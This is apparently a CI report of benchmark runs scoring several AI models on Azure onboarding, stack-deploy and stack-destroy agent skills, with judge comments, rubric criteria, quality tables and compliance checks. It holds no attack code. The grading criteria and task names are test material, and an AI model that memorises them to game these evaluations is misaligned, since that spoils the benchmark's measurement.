✓ [4/4] Positive — Scaffold honors skip-with-notice on collision
✓ [3/4] Positive — Multi-environment onboarding
✗ [2/4] Positive — First-time repo setup

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.76 | Duration: 1m30.527s

  • Tests: 4 total, 3 passed, 1 failed, 0 errors
  • Success Rate: 75.0%
  • Score Range: 0.56 - 0.98 (σ=0.1857)

Task Results

Task Score Status Graders
Negative — Storage service comparison (off-topic) 0.56 budget, trigger_relevance_negative
Positive — First-time repo setup 0.60 answer_quality, budget, trigger_relevance_positive
Positive — Multi-environment onboarding 0.91 answer_quality, budget, trigger_relevance_positive
Positive — Scaffold honors skip-with-notice on collision 0.98 answer_quality, budget, trigger_relevance_positive

Failed Task Details

Positive — First-time repo setup

Run 1/1 (failed):

  • answer_quality (0.00): fail: Missing prereq results presentation: Criterion 1 not met: No prereq check results table or list of tool versions (az, gh, jq, git) was presented. The agent attempted to run check-tools.sh and version commands but all bash/view tool calls failed with "unexpected user permission response", and the agent did not produce any substitute status table or version list proving environment inspection. Criterion 2 partially met but not via an Azure CLI auth status row — the agent surfaced a generic "sandboxed environment" blocker rather than an explicit Azure/GitHub auth gate. Criteria 3 (requested 5 inputs: repo URL, subscription ID, RBAC role, mode, OS/shell) and 4 (made no false configuration claims; explicitly waited for user input) are satisfied.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.81): Prompt is trigger-aligned (score 0.81 >= 0.50)

Benchmark: git-ape-onboarding-eval | Skill: git-ape-onboarding | Model: claude-sonnet-4.6

Results saved to: .waza-results/git-ape-onboarding-claude-sonnet-4.6.json

Model: gpt-5.3-codex

Running benchmark: git-ape-onboarding-eval
Skill: git-ape-onboarding
Engine: copilot-sdk
Model: gpt-5.3-codex
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [1/4] Negative — Storage service comparison (off-topic)
✓ [4/4] Positive — Scaffold honors skip-with-notice on collision
✗ [3/4] Positive — Multi-environment onboarding
[ERROR] waiting for session.idle: context deadline exceeded

✗ [2/4] Positive — First-time repo setup

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.68 | Duration: 3m16.422s

  • Tests: 4 total, 2 passed, 2 failed, 0 errors
  • Success Rate: 50.0%
  • Score Range: 0.56 - 0.98 (σ=0.1748)

Task Results

Task Score Status Graders
Negative — Storage service comparison (off-topic) 0.56 budget, trigger_relevance_negative
Positive — First-time repo setup 0.60 answer_quality, budget, trigger_relevance_positive
Positive — Multi-environment onboarding 0.58 answer_quality, budget, trigger_relevance_positive
Positive — Scaffold honors skip-with-notice on collision 0.98 answer_quality, budget, trigger_relevance_positive

Failed Task Details

Positive — First-time repo setup

Run 1/1 (error):

  • answer_quality (0.00): fail: Response did not present a gated step-1 reply: Criterion 1 FAIL: No prereq check results were presented — the bash command returned "unexpected user permission response" and the assistant did not produce a tool/auth status table or list. Criterion 2 FAIL: No auth gate was surfaced (no Azure/GitHub auth status shown, no ❌ marker, no "az login required" message). Criterion 3 FAIL: The assistant did not request any of the required inputs (target repo, subscription ID, RBAC role, region, project name, mode) — it only said it would "collect" them later. Criterion 4 PASS: The assistant did not falsely claim to have configured OIDC, federated credentials, environments, or scaffolded files. Overall: the reply is a tool-invocation stub rather than the expected gated handoff that presents prereq results and solicits the required onboarding inputs.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.81): Prompt is trigger-aligned (score 0.81 >= 0.50)

Positive — Multi-environment onboarding

Run 1/1 (failed):

  • answer_quality (0.00): fail: Missing prereq execution and input gathering: Criteria 1 and 2 are not met: the assistant did not actually run or present prereq check results (no tool/auth status output, no inspection of az/gh/jq versions or auth state), and therefore did not surface the auth/prereq gate either — it merely instructed the user to run /prereq-check themselves. Criterion 3 is also not met: the assistant did not request the required inputs (e.g., target repo URL, staging subscription ID, RBAC role, App Registration reuse decision, environment name confirmation, onboarding mode) before proceeding — instead it presented a complete set of executable commands with placeholders. Criterion 4 IS met: the response mentions creating a new federated credential fc-azure-deploy-staging, references the azure-deploy-staging environment name, and discusses per-environment scoping of secrets/RBAC to the staging subscription.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.73): Prompt is trigger-aligned (score 0.73 >= 0.50)

Benchmark: git-ape-onboarding-eval | Skill: git-ape-onboarding | Model: gpt-5.3-codex

Results saved to: .waza-results/git-ape-onboarding-gpt-5.3-codex.json

Model: gpt-5.4 *(baseline — A/B mode)*

Running benchmark: git-ape-onboarding-eval
Skill: git-ape-onboarding
Engine: copilot-sdk
Model: gpt-5.4
Judge Model: claude-opus-4.7
Parallel: 4 workers

════════════════════════════════════════════════════════════════
PASS 1: Skills-Enabled Run
════════════════════════════════════════════════════════════════
✓ [1/4] Negative — Storage service comparison (off-topic)
✓ [4/4] Positive — Scaffold honors skip-with-notice on collision
✗ [3/4] Positive — Multi-environment onboarding
✗ [2/4] Positive — First-time repo setup

════════════════════════════════════════════════════════════════
PASS 2: Skills Baseline (skills stripped)
════════════════════════════════════════════════════════════════
✓ [1/4] Negative — Storage service comparison (off-topic)
✗ [2/4] Positive — First-time repo setup
✓ [4/4] Positive — Scaffold honors skip-with-notice on collision
✗ [3/4] Positive — Multi-environment onboarding

════════════════════════════════════════════════════════════════
SKILL IMPACT ANALYSIS
════════════════════════════════════════════════════════════════
Overall Performance Delta:
With Skills: 50.0% (2/4 tasks passed)
Without Skills: 50.0% (2/4 tasks passed)
Impact: no change

Per-Task Breakdown:
• Negative — Storage service comparison (off-topic) [NEUTRAL] 100% → 100% (+0pp)
• Positive — First-time repo setup [NEUTRAL] 0% → 0% (+0pp)
• Positive — Multi-environment onboarding [NEUTRAL] 0% → 0% (+0pp)
• Positive — Scaffold honors skip-with-notice on collision [NEUTRAL] 100% → 100% (+0pp)

Verdict: Skills have NEUTRAL IMPACT (no net change)
════════════════════════════════════════════════════════════════

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.68 | Duration: 1m27.038s

  • Tests: 4 total, 2 passed, 2 failed, 0 errors
  • Success Rate: 50.0%
  • Score Range: 0.56 - 0.98 (σ=0.1748)

Task Results

Task Score Status Graders
Negative — Storage service comparison (off-topic) 0.56 budget, trigger_relevance_negative
Positive — First-time repo setup 0.60 answer_quality, budget, trigger_relevance_positive
Positive — Multi-environment onboarding 0.58 answer_quality, budget, trigger_relevance_positive
Positive — Scaffold honors skip-with-notice on collision 0.98 answer_quality, budget, trigger_relevance_positive

Failed Task Details

Positive — First-time repo setup

Run 1/1 (failed):

  • answer_quality (0.00): fail: Missing prereq results: Criterion 1 not met: the response does not present any prereq check results — no table/list of az/gh/jq/git versions and no Azure or GitHub auth status. The agent reported "UNABLE TO EXECUTE" because the shell was blocked, but never produced the inspection output the gate requires. Criterion 2 is also not satisfied in the expected form: there is no explicit ❌ on an Azure auth row or "az login required" message tied to a prereq check; only a generic runtime-permission failure. Criteria 3 (asks for repo URL, subscription IDs/roles, compliance framework, policy mode, confirmation — ≥3 inputs) and 4 (no fabricated claims of configuring OIDC/RBAC/environments/scaffolding) are met.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.81): Prompt is trigger-aligned (score 0.81 >= 0.50)

Positive — Multi-environment onboarding

Run 1/1 (failed):

  • answer_quality (0.00): fail: Response skipped the prereq gate and proceeded straight to a 10-step playbook without gathering required inputs.: Criterion 1 missing: no prereq check results / tool / auth inspection was presented — the response only tells the user to "Run /prereq-check" without showing any output or inspecting the local env. Criterion 2 missing: no explicit auth/prereq gate is surfaced (no statement that az/gh are or aren't authenticated). Criterion 3 missing: the agent does not request inputs before proceeding — there are no numbered questions or input block; staging subscription ID, repo, RBAC role, and app-reuse decision all appear as inside an executable playbook rather than as gating questions. Criterion 4 satisfied: the response explicitly names the azure-deploy-staging environment, describes a new fc-azure-deploy-staging federated credential, and discusses per-environment secrets/variables and staging-subscription RBAC scoping. Overall: only 1 of 4 criteria met (criterion 4).
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.73): Prompt is trigger-aligned (score 0.73 >= 0.50)

Benchmark: git-ape-onboarding-eval | Skill: git-ape-onboarding | Model: gpt-5.4

Results saved to: .waza-results/git-ape-onboarding-gpt-5.4.json

🔢 Tokens (count + profile)

📊 git-ape-onboarding: 3,101 tokens (detailed ✓), 17 sections, 15 code blocks
   ⚠️  token count 3101 exceeds 1000

🎯 Quality (5-dim table)

DIMENSION          SCORE  FEEDBACK
────────────────────────────────────────────
clarity            ████░  The skill is well-structured with numbered playbook steps, concrete CLI examples, an Invariants block, and a Suggested Agent Flow summary. Minor deduction: the 'Create or reuse' wording in Step 3 is not backed by code for the reuse path, leaving the agent to improvise for an existing app registration.
completeness       ████░  Edge cases (org OIDC subject override, disabled subscriptions) are explicitly handled with detection commands and fix instructions. Missing: no rollback guidance if onboarding fails mid-way (e.g., RBAC assigned but secrets not set), and no de-onboarding/teardown procedure.
trigger_precision  ███░░  The 'When to Use' section lists four valid scenarios clearly, but there is no 'DO NOT USE FOR' section — the skill gives no signal to route away from it (e.g., re-onboarding an already-configured repo, or subscription-only RBAC changes without a repo). This risks misuse for partial reconfiguration tasks.
scope_coverage     ████░  The 'What It Configures' list and Safe-Execution Rules together establish clear boundaries. However, limitations are implicit rather than explicit — there is no statement about what the skill deliberately does NOT do (e.g., it won't create the subscription, won't manage Azure Policy assignments, won't handle private GitHub Enterprise endpoints).
anti_patterns      ████░  The Invariants block proactively prevents the classic main/master substitution bug, and safe-execution rule #3 guards against secret leakage. One anti-pattern remains: Step 9 references templates at './templates/' with a relative path that only resolves correctly if the agent's working directory is the skill root — this should use an explicit, anchored path or a clear resolution instruction.
────────────────────────────────────────────
Overall: 3.8/5.0

A high-quality, production-oriented skill with strong invariant enforcement, concrete CLI playbooks, and meaningful edge-case coverage. The main gaps are the absence of a DO NOT USE FOR trigger section (hurting routing precision), missing rollback guidance for partial failures, and the implicit rather than explicit limitations boundary. Addressing those three points would push this to a 4.5+.
✅ Check (compliance summary) (64 lines — click to expand)

ℹ️ waza check expects eval.yaml colocated with SKILL.md. This repo separates them into .github/evals/git-ape-onboarding/eval.yaml, so the "Evaluation Suite: Not Found" line below is a false negative — the eval actually ran (see the Score section above).

🔍 Skill Readiness Check
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Skill: git-ape-onboarding

📋 Compliance Score: Medium
   ⚠️  Needs improvement. Missing anti-triggers and routing clarity.

   Issues found:
   ❌  SKILL.md is 3101 tokens (hard limit 500)

📐 Spec Compliance: 8/9 checks passed
   ❌  Does not fully meet agentskills.io specification.
   ❌  [spec-allowed-fields] Unknown frontmatter fields: argument-hint, user-invocable
     📎  agentskills.io spec allows: name, description, license, allowed-tools, metadata, compatibility

📎 Links: 2/5 valid
   ⚠️  3 link issue(s) found.
   ❌  [templates/copilot-instructions.md] → .github/skills/azure-stack-deploy/SKILL.md: target does not exist
   ❌  [templates/copilot-instructions.md] → website/docs/deployment/state.md: target does not exist
   ❌  [templates/copilot-instructions.md] → .github/skills/azure-stack-destroy/SKILL.md: target does not exist

📊 Token Budget: 3101 / 500 tokens
   ❌  Exceeds limit by 2601 tokens. Consider reducing content.

🧪 Evaluation Suite: Found
   ✅  eval.yaml detected. Run 'waza run eval.yaml' to test.

📐 Schema Validation: Passed
   ✅  eval.yaml schema valid
   ✅  4 task file(s) validated

💡 Advisory Checks
   ✅  [module-count] Found 0 reference module(s)
   ❌  [complexity] Complexity: comprehensive (3101 tokens, 0 modules)
   ❌  [negative-delta-risk] Negative delta risk patterns detected: excessive constraints (12 constraint keywords found)
   ✅  [procedural-content] Description contains procedural language
   ✅  [over-specificity] No over-specificity patterns detected
   ✅  [cross-model-density] Advisory 16: first sentence doesn't lead with action verb (reduces clarity)
   ❌  [body-structure] Advisory 17: body structure quality — no examples section found; no error handling or troubleshooting section found
   ✅  [progressive-disclosure] Content structure supports progressive disclosure
   ✅  [scope-reduction] Capability scope: 10 signal(s) detected (10 level-2 heading(s), 5 numbered procedure(s))

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Overall Readiness
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  Your skill needs some work before submission.

🎯 Next Steps
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

To improve your skill:

1. Add a 'DO NOT USE FOR:' section to clarify when NOT to use this skill
2. Add routing clarity (e.g., **UTILITY SKILL**, INVOKES:, FOR SINGLE OPERATIONS:)
3. Run 'waza dev' for interactive compliance improvement
4. Fix spec violation [spec-allowed-fields]: Unknown frontmatter fields: argument-hint, user-invocable
5. Fix 3 broken link(s) — targets do not exist
6. Reduce SKILL.md by 2601 tokens. Run 'waza tokens suggest' for optimization tips

Skill: azure-stack-deploy

📈 Score (per model) + Suggestions/Recommendations
Model: claude-sonnet-4.6

Running benchmark: azure-stack-deploy-eval
Skill: azure-stack-deploy
Engine: copilot-sdk
Model: claude-sonnet-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [5/5] Positive — Re-deploy after template edit
✓ [2/5] Negative — Off-topic prompt (Linux kernel scheduling)
✗ [3/5] Negative — What-if preview / preflight validation
✗ [1/5] Negative — Destroying / tearing down an existing deployment
✗ [4/5] Positive — Local deploy of an existing deployment artifact

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.78 | Duration: 2m28.072s

  • Tests: 5 total, 2 passed, 3 failed, 0 errors
  • Success Rate: 40.0%
  • Score Range: 0.60 - 0.86 (σ=0.0946)

Task Results

Task Score Status Graders
Negative — Destroying / tearing down an existing deployment 0.86 budget, trigger_relevance_negative
Negative — Off-topic prompt (Linux kernel scheduling) 0.60 budget, trigger_relevance_negative
Negative — What-if preview / preflight validation 0.82 budget, trigger_relevance_negative
Positive — Local deploy of an existing deployment artifact 0.78 answer_quality, budget, trigger_relevance_positive
Positive — Re-deploy after template edit 0.85 answer_quality, budget, trigger_relevance_positive

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — Local deploy of an existing deployment artifact: 50% pass rate, score=0.78±0.17

Failed Task Details

Negative — Destroying / tearing down an existing deployment

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.71): Prompt appears trigger-aligned unexpectedly (score 0.71 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.71): Prompt appears trigger-aligned unexpectedly (score 0.71 >= 0.50)

Negative — What-if preview / preflight validation

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.65): Prompt appears trigger-aligned unexpectedly (score 0.65 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.65): Prompt appears trigger-aligned unexpectedly (score 0.65 >= 0.50)

Positive — Local deploy of an existing deployment artifact

Run 2/2 (failed):

  • answer_quality (0.00): fail: Missing criterion 4: Criteria 1, 2, 3 met (mentions az stack sub create, includes --action-on-unmanage deleteAll, references .github/skills/azure-stack-deploy/scripts/deploy-stack.sh). Criterion 4 not fully met: the response mentions state.json write but does not specify schemaVersion 1.0, nor does it explicitly state that the stack ID and managed resources are captured in it.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.83): Prompt is trigger-aligned (score 0.83 >= 0.50)

Benchmark: azure-stack-deploy-eval | Skill: azure-stack-deploy | Model: claude-sonnet-4.6

Results saved to: .waza-results/azure-stack-deploy-claude-sonnet-4.6.json

Model: gpt-5.3-codex

Running benchmark: azure-stack-deploy-eval
Skill: azure-stack-deploy
Engine: copilot-sdk
Model: gpt-5.3-codex
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [2/5] Negative — Off-topic prompt (Linux kernel scheduling)
✗ [1/5] Negative — Destroying / tearing down an existing deployment
✗ [3/5] Negative — What-if preview / preflight validation
✓ [5/5] Positive — Re-deploy after template edit
✗ [4/5] Positive — Local deploy of an existing deployment artifact

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.78 | Duration: 1m55.058s

  • Tests: 5 total, 2 passed, 3 failed, 0 errors
  • Success Rate: 40.0%
  • Score Range: 0.60 - 0.86 (σ=0.0946)

Task Results

Task Score Status Graders
Negative — Destroying / tearing down an existing deployment 0.86 budget, trigger_relevance_negative
Negative — Off-topic prompt (Linux kernel scheduling) 0.60 budget, trigger_relevance_negative
Negative — What-if preview / preflight validation 0.82 budget, trigger_relevance_negative
Positive — Local deploy of an existing deployment artifact 0.78 answer_quality, budget, trigger_relevance_positive
Positive — Re-deploy after template edit 0.85 answer_quality, budget, trigger_relevance_positive

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — Local deploy of an existing deployment artifact: 50% pass rate, score=0.78±0.17

Failed Task Details

Negative — Destroying / tearing down an existing deployment

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.71): Prompt appears trigger-aligned unexpectedly (score 0.71 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.71): Prompt appears trigger-aligned unexpectedly (score 0.71 >= 0.50)

Negative — What-if preview / preflight validation

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.65): Prompt appears trigger-aligned unexpectedly (score 0.65 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.65): Prompt appears trigger-aligned unexpectedly (score 0.65 >= 0.50)

Positive — Local deploy of an existing deployment artifact

Run 1/2 (failed):

  • answer_quality (0.00): fail: Missing detail on state.json contents: Criteria 1, 2, 3 met: response names az stack sub create, includes --action-on-unmanage deleteAll, and references .github/skills/azure-stack-deploy/scripts/deploy-stack.sh. Criterion 4 NOT met: the response only says "writes state.json for single-command teardown" without mentioning schemaVersion 1.0 or that it captures the stack ID and managed resources.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.83): Prompt is trigger-aligned (score 0.83 >= 0.50)

Benchmark: azure-stack-deploy-eval | Skill: azure-stack-deploy | Model: gpt-5.3-codex

Results saved to: .waza-results/azure-stack-deploy-gpt-5.3-codex.json

🔢 Tokens (count + profile)

📊 azure-stack-deploy: 1,912 tokens (detailed ✓), 13 sections, 5 code blocks
   ⚠️  token count 1912 exceeds 1000

🎯 Quality (5-dim table)

DIMENSION          SCORE  FEEDBACK
────────────────────────────────────────────
clarity            █████  Purpose is immediately obvious, steps are logically ordered (locate → run → inspect → report), and concrete bash/PowerShell commands eliminate ambiguity. The 'What to tell the user' section is an especially useful finishing directive.
completeness       █████  Covers prerequisites, arguments, procedure, state.json schema, soft-deletable resource types, failure modes, and cross-links to related skills. Edge cases like race conditions on state.json and missing template.json are explicitly handled.
trigger_precision  ████░  USE FOR and DO NOT USE FOR sections clearly name alternative skills for adjacent tasks (destroy, preflight, template authoring), preventing misrouting. Minor gap: 'prepared Git-Ape deployment artifact' assumes familiarity with the ecosystem — a one-line definition would help new users route correctly.
scope_coverage     █████  Scope is tightly bounded to subscription-scoped stack creation and state capture. Capabilities and limitations are explicit, and the fallback path is documented with an explicit trade-off warning so agents understand when they're operating outside the ideal path.
anti_patterns      ████░  No vague instructions, no conflicting directives, and error handling is concrete (failure table with causes and recovery steps). The mandatory fallback to `az deployment sub create` is a minor complexity risk — agents could silently lose stack semantics — but the `--no-fallback` flag and the ⚠️ warning message mitigate this well.
────────────────────────────────────────────
Overall: 4.6/5.0

A high-quality, production-ready skill document. It is exceptionally thorough — schema documentation, soft-delete classification, dual-shell support, and an explicit post-run communication contract are all strong differentiators. The only actionable improvements are defining 'Git-Ape deployment artifact' for cold-start routing and ensuring the fallback path cannot be silently triggered in security-sensitive contexts.
✅ Check (compliance summary) (70 lines — click to expand)

ℹ️ waza check expects eval.yaml colocated with SKILL.md. This repo separates them into .github/evals/azure-stack-deploy/eval.yaml, so the "Evaluation Suite: Not Found" line below is a false negative — the eval actually ran (see the Score section above).

🔍 Skill Readiness Check
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Skill: azure-stack-deploy

📋 Compliance Score: Low
   ❌  Needs significant improvement. Description too short or missing triggers.

   Issues found:
   ❌  SKILL.md is 1912 tokens (hard limit 500)

📐 Spec Compliance: 8/9 checks passed
   ❌  Does not fully meet agentskills.io specification.
   ❌  [spec-allowed-fields] Unknown frontmatter fields: argument-hint, user-invocable
     📎  agentskills.io spec allows: name, description, license, allowed-tools, metadata, compatibility

📎 Links: 0/8 valid
   ⚠️  8 link issue(s) found.
   ❌  [SKILL.md] → ../azure-stack-destroy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-stack-destroy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-deployment-preflight/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../../../website/docs/deployment/state.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-stack-destroy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-stack-destroy/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-deployment-preflight/SKILL.md: link escapes skill directory
   ❌  [SKILL.md] → ../azure-security-analyzer/SKILL.md: link escapes skill directory

📊 Token Budget: 1912 / 500 tokens
   ❌  Exceeds limit by 1412 tokens. Consider reducing content.

🧪 Evaluation Suite: Found
   ✅  eval.yaml detected. Run 'waza run eval.yaml' to test.

📐 Schema Validation: Passed
   ✅  eval.yaml schema valid
   ✅  5 task file(s) validated

💡 Advisory Checks
   ✅  [module-count] Found 0 reference module(s)
   ❌  [complexity] Complexity: comprehensive (1912 tokens, 0 modules)
   ✅  [negative-delta-risk] No negative delta risk patterns detected
   ✅  [procedural-content] Description contains procedural language
   ✅  [over-specificity] No over-specificity patterns detected
   ✅  [cross-model-density] Description density is optimal for cross-model use
   ❌  [body-structure] Advisory 17: body structure quality — no examples section found; no error handling or troubleshooting section found
   ✅  [progressive-disclosure] Content structure supports progressive disclosure
   ✅  [scope-reduction] Capability scope: 10 signal(s) detected (10 level-2 heading(s), 2 numbered procedure(s))

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
📈 Overall Readiness
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  Your skill needs some work before submission.

🎯 Next Steps
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

To improve your skill:

1. Add a 'USE FOR:' section with 3-5 trigger phrases that activate the skill
2. Add a 'DO NOT USE FOR:' section to clarify when NOT to use this skill
3. Add routing clarity (e.g., **UTILITY SKILL**, INVOKES:, FOR SINGLE OPERATIONS:)
4. Run 'waza dev' for interactive compliance improvement
5. Fix spec violation [spec-allowed-fields]: Unknown frontmatter fields: argument-hint, user-invocable
6. Fix 8 link(s) that escape the skill directory
7. Reduce SKILL.md by 1412 tokens. Run 'waza tokens suggest' for optimization tips

Skill: azure-stack-destroy

📈 Score (per model) + Suggestions/Recommendations
Model: claude-sonnet-4.6

Running benchmark: azure-stack-destroy-eval
Skill: azure-stack-destroy
Engine: copilot-sdk
Model: claude-sonnet-4.6
Judge Model: claude-opus-4.7
Parallel: 4 workers

✗ [2/5] Negative — Deleting a non-Git-Ape resource group
✗ [1/5] Negative — Deploying a new stack (opposite operation)
✓ [3/5] Negative — Off-topic prompt (Linux kernel scheduling)
✗ [4/5] Positive — Clean up the deployment stack
✓ [5/5] Positive — Local destroy of a Git-Ape deployment

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.77 | Duration: 1m55.947s

  • Tests: 5 total, 2 passed, 3 failed, 0 errors
  • Success Rate: 40.0%
  • Score Range: 0.60 - 0.96 (σ=0.1399)

Task Results

Task Score Status Graders
Negative — Deploying a new stack (opposite operation) 0.81 budget, trigger_relevance_negative
Negative — Deleting a non-Git-Ape resource group 0.87 budget, trigger_relevance_negative
Negative — Off-topic prompt (Linux kernel scheduling) 0.60 budget, trigger_relevance_negative
Positive — Clean up the deployment stack 0.62 answer_quality, budget, trigger_relevance_positive
Positive — Local destroy of a Git-Ape deployment 0.96 answer_quality, budget, trigger_relevance_positive

Failed Task Details

Negative — Deploying a new stack (opposite operation)

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.62): Prompt appears trigger-aligned unexpectedly (score 0.62 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.62): Prompt appears trigger-aligned unexpectedly (score 0.62 >= 0.50)

Negative — Deleting a non-Git-Ape resource group

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.73): Prompt appears trigger-aligned unexpectedly (score 0.73 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.73): Prompt appears trigger-aligned unexpectedly (score 0.73 >= 0.50)

Positive — Clean up the deployment stack

Run 1/2 (failed):

  • answer_quality (0.00): fail: Missing explicit contrast with raw az group delete: Criteria 2, 3, 4 are met: response references state.json prerequisite under .azure/deployments/deploy-20260524-test/, mentions az stack sub delete --action-on-unmanage deleteAll removing all resources across all RGs in one call, and covers purging Key Vaults and Cognitive Services soft-deletes. However, criterion 1 is only partially met — the response recommends the destroy-stack.sh script over raw az commands, but does NOT explicitly explain WHY raw az group delete is inadequate (i.e., that it misses soft-delete cleanup and multi-RG/subscription-scope resources). The rationale comparison is absent.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.88): Prompt is trigger-aligned (score 0.88 >= 0.50)

Run 2/2 (failed):

  • answer_quality (0.00): fail: Missing explicit comparison to raw az group delete: Criterion 1 not fully met: the response recommends the destroy-stack.sh script and mentions deleteAll semantics, but does NOT explicitly contrast with raw az group delete nor explain that raw RG delete misses soft-delete cleanup and multi-RG/subscription-scope resources. Criteria 2, 3, 4 are satisfied (state.json prerequisite mentioned, deleteAll semantics described, Key Vault/Cognitive Services purge sweep covered).
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.88): Prompt is trigger-aligned (score 0.88 >= 0.50)

Benchmark: azure-stack-destroy-eval | Skill: azure-stack-destroy | Model: claude-sonnet-4.6

Results saved to: .waza-results/azure-stack-destroy-claude-sonnet-4.6.json

Model: gpt-5.3-codex

Running benchmark: azure-stack-destroy-eval
Skill: azure-stack-destroy
Engine: copilot-sdk
Model: gpt-5.3-codex
Judge Model: claude-opus-4.7
Parallel: 4 workers

✓ [3/5] Negative — Off-topic prompt (Linux kernel scheduling)
✗ [1/5] Negative — Deploying a new stack (opposite operation)
✗ [2/5] Negative — Deleting a non-Git-Ape resource group
✗ [5/5] Positive — Local destroy of a Git-Ape deployment
✗ [4/5] Positive — Clean up the deployment stack

🧪 Waza Eval Results

Status: ❌ Failed | Score: 0.74 | Duration: 1m54.897s

  • Tests: 5 total, 1 passed, 4 failed, 0 errors
  • Success Rate: 20.0%
  • Score Range: 0.60 - 0.87 (σ=0.1064)

Task Results

Task Score Status Graders
Negative — Deploying a new stack (opposite operation) 0.81 budget, trigger_relevance_negative
Negative — Deleting a non-Git-Ape resource group 0.87 budget, trigger_relevance_negative
Negative — Off-topic prompt (Linux kernel scheduling) 0.60 budget, trigger_relevance_negative
Positive — Clean up the deployment stack 0.62 answer_quality, budget, trigger_relevance_positive
Positive — Local destroy of a Git-Ape deployment 0.80 answer_quality, budget, trigger_relevance_positive

⚠️ Flaky Tasks

The following tasks showed inconsistent results across runs:

  • Positive — Local destroy of a Git-Ape deployment: 50% pass rate, score=0.80±0.17

Failed Task Details

Negative — Deploying a new stack (opposite operation)

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.62): Prompt appears trigger-aligned unexpectedly (score 0.62 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.62): Prompt appears trigger-aligned unexpectedly (score 0.62 >= 0.50)

Negative — Deleting a non-Git-Ape resource group

Run 1/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.73): Prompt appears trigger-aligned unexpectedly (score 0.73 >= 0.50)

Run 2/2 (failed):

  • budget (1.00): All behavior checks passed
  • trigger_relevance_negative (0.73): Prompt appears trigger-aligned unexpectedly (score 0.73 >= 0.50)

Positive — Clean up the deployment stack

Run 1/2 (failed):

  • answer_quality (0.00): fail: Response only points the user to the destroy script without covering the required substance.: Missing criteria:
  1. (Partial) Recommends destroy-stack.sh but does NOT explain why over raw az group delete (no mention of soft-delete cleanup or multi-RG coverage being missed).
  2. Does NOT reference the state.json prerequisite under .azure/deployments/deploy-20260524-test/.
  3. Does NOT mention az stack sub delete --action-on-unmanage deleteAll or its single-call cleanup semantics.
  4. Does NOT cover the soft-delete purge sweep (Key Vault / Cognitive Services) nor the purgeProtected: true retention behavior.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.88): Prompt is trigger-aligned (score 0.88 >= 0.50)

Run 2/2 (failed):

  • answer_quality (0.00): fail: Response missing key destroy-skill details: The assistant was blocked by tool errors and only provided a one-line command to run the destroy script. Missing criteria:
  • (1) Partial: recommends destroy-stack.sh but does not explicitly contrast with raw az group delete or explain that raw RG delete misses soft-delete cleanup / multi-RG resources.
  • (2) Missing: no mention of the state.json prerequisite under .azure/deployments/deploy-20260524-test/.
  • (3) Missing: no mention of az stack sub delete --action-on-unmanage deleteAll (or equivalent single-delete semantics).
  • (4) Missing: no mention of the soft-delete purge sweep (Key Vault, Cognitive Services) nor of purgeProtected: true retention behavior.
  • budget (1.00): All behavior checks passed
  • trigger_relevance_positive (0.88): Prompt is trigger-aligned (score 0.88 >= 0.50)

